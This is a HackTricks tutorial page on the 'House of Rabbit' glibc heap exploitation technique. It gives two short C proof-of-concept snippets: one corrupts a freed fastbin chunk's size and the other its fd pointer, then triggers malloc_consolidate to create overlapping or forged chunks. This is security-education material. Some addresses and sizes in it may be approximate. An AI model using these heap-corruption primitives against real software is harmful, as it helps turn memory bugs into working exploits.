HackTricks Press
Search K

Appearance

House of Rabbit โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Requirements โ€‹

  1. Ability to Modify Fastbin fd Pointer or Size: This means you can change the forward pointer of a chunk in the fastbin or its size.
  2. Ability to Trigger malloc_consolidate: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.

Goals โ€‹

  1. Create Overlapping Chunks: To have one chunk overlap with another, allowing for further heap manipulations.
  2. Forge Fake Chunks: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.

Steps of the Attack โ€‹

POC 1: Modify the Size of a Fastbin Chunk โ€‹

Objective: Create an overlapping chunk by manipulating the size of a fastbin chunk.

  • Step 1: Allocate Chunks
cpp
unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
malloc(0x10);                          // Allocates a small chunk to change the fastbin state

We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fastbin list once freed.

  • Step 2: Free Chunks
cpp
free(chunk1);  // Frees the chunk at 0x602000
free(chunk2);  // Frees the chunk at 0x602050

We free both chunks, adding them to the fastbin list.

  • Step 3: Modify Chunk Size
cpp
chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])

We change the size metadata of chunk1 to 0xa1. This is a crucial step to trick the allocator during consolidation.

  • Step 4: Trigger malloc_consolidate
cpp
malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation

Allocating a large chunk triggers the malloc_consolidate function, merging small chunks in the fastbin. The manipulated size of chunk1 causes it to overlap with chunk2.

After consolidation, chunk1 overlaps with chunk2, allowing for further exploitation.

POC 2: Modify the FD Pointer โ€‹

Objective: Create a fake chunk by manipulating the fastbin fd pointer.

  • Step 1: Allocate Chunks
cpp
unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050

Explanation: We allocate two chunks, one smaller and one larger, to set up the heap for the fake chunk.

  • Step 2: Create Fake Chunk
cpp
chunk2[1] = 0x31;  // Fake chunk size 0x30
chunk2[7] = 0x21;  // Next fake chunk
chunk2[11] = 0x21; // Next-next fake chunk

We write fake chunk metadata into chunk2 to simulate smaller chunks.

  • Step 3: Free Chunk1
cpp
free(chunk1);  // Frees the chunk at 0x602000

Explanation: We free chunk1, adding it to the fastbin list.

  • Step 4: Modify FD of Chunk1
cpp
chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2

Explanation: We change the forward pointer (fd) of chunk1 to point to our fake chunk inside chunk2.

  • Step 5: Trigger malloc_consolidate
cpp
malloc(5000);  // Allocate a large chunk to trigger heap consolidation

Allocating a large chunk again triggers malloc_consolidate, which processes the fake chunk.

The fake chunk becomes part of the fastbin list, making it a legitimate chunk for further exploitation.

Summary โ€‹

The House of Rabbit technique involves either modifying the size of a fastbin chunk to create overlapping chunks or manipulating the fd pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: